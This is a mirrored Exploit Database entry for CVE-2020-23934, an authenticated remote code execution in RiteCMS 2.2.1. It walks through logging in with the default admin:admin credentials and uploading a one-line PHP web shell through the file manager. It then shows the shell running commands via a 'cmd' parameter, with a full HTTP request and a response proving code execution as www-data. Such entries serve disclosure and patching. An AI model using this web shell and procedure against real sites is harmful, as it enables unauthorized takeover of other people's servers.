RiteCMS 2.2.1 – Authenticated Remote Code Execution

• Exploit Database
• 16 阅读

• 作者： Enes Özeser
  日期： 2020-07-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48636/

• # Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
  # Date: 2020-07-03
  # Exploit Author: Enes Özeser
  # Vendor Homepage: http://ritecms.com/
  # Version: 2.2.1
  # Tested on: Linux
  # CVE: CVE-2020-23934
  
  1- Go to following url. >> http://(HOST)/cms/
  2- Default username and password is admin:admin. We must know login credentials.
  3- Go to "Filemanager" and press "Upload file" button.
  4- Choose your php web shell script and upload it. 
   
  PHP Web Shell Code == <?php system($_GET['cmd']); ?>
  
  5- You can find uploaded file there. >> http://(HOST)/media/(FILE-NAME).php
  6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=id
  
  (( REQUEST ))
  
  GET /media/(FILE-NAME).php?cmd=id HTTP/1.1
  Host: (HOST)
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://(HOST)/cms/index.php?mode=filemanager&directory=media
  Connection: close
  Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
  Upgrade-Insecure-Requests: 1
  
  
  (( RESPONSE ))
  
  HTTP/1.1 200 OK
  Date: Fri, 06 Jul 2020 20:02:13 GMT
  Server: Apache/2.4.43 (Debian)
  Content-Length: 14
  Connection: close
  Content-Type: text/html; charset=UTF-8
  uid=33(www-data) gid=33(www-data) groups=33(www-data)